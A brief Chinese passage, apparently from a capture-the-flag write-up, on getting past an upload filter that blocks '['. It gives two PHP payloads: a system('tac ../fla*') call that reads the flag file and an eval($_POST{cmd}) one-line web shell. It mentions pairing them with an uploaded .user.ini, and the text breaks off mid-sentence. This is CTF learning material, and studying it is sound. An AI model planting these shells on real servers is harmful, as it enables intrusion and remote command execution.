在前面基础上还过滤了[ 但是可以利用直接代码执行,或者用{}进行绕过 ```shell <?= system(‘tac ../fla*’);?> <?= eval($_POST{cmd});?> ``` 配合上传.user.ini进行解析,利用工具rec